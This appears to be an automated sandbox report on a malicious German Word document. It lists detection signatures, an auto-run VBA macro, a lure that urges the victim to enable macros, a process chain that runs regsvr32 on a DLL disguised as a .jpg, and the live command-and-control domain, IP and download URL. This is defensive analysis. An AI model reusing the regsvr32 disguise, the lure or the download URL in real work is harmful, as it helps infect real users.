Loading ...

Play interactive tourEdit tour

Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name:Datei-04.28.2021.doc
Analysis ID:399362
MD5:6747583727ce069aa8ae9d398d35e5bc
SHA1:97667bf552bf5557666b5266003b0411bc1669bc
SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA with base64 encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6088 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • WINWORD.EXE (PID: 6224 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • regsvr32.exe (PID: 6360 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6224, ProcessCommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, ProcessId: 6360

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Datei-04.28.2021.docVirustotal: Detection: 12%Perma Link
Machine Learning detection for sampleShow sources
Source: Datei-04.28.2021.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficDNS query: name: better-transport-2008.com
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 45.142.215.160:80
Source: global trafficTCP traffic: 192.168.2.5:49710 -> 45.142.215.160:80
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: better-transport-2008.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: better-transport-2008.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.binString found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.aadrm.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.cortana.ai
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.office.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.onedrive.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://augloop.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://augloop.office.com/v2
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cdn.entity.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://clients.config.office.net/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://config.edge.skype.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cortana.ai
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cortana.ai/api
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://cr.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dev.cortana.ai
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://devnull.onenote.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://directory.services.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://graph.windows.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://graph.windows.net/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://lifecycle.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://login.windows.local
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://management.azure.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://management.azure.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://messaging.office.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ncus.contentsync.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://officeapps.live.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://onedrive.live.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://outlook.office.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://outlook.office365.com/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://powerlift.acompli.net
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://settings.outlook.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://staging.cortana.ai
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://tasks.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://webshell.suite.office.com
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://wus2.contentsync.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Inhalt aktivieren't m % I i '00% O Type here to search Ki E a a g wg sf ^ @ g") ,::::,:, Cl
Source: Screenshot number: 4Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren't m % I i '00% O Typ
Source: Screenshot number: 8Screenshot OCR: Bearbeitung aktivieren" in der Qberen Leibte und dann auf .Inhale akrNieren". Page1 of 1 Owords It?
Source: Document image extraction number: 0Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 0Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Document contains an embedded VBA with base64 encoded stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module optionRemoveGeneric, Function memoryIndex, String ThisDocument
Source: Datei-04.28.2021.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module listCopy, Function autoopen
Source: Datei-04.28.2021.docOLE indicator, VBA macros: true
Source: Datei-04.28.2021.docOLE indicator has summary info: false
Source: Datei-04.28.2021.docOLE indicator application name: unknown
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: classification engineClassification label: mal76.expl.winDOC@4/14@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E14FE529-DE62-4544-9D12-ECD5D5E4A8E5} - OProcSessId.datJump to behavior
Source: Datei-04.28.2021.docOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Datei-04.28.2021.docVirustotal: Detection: 12%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
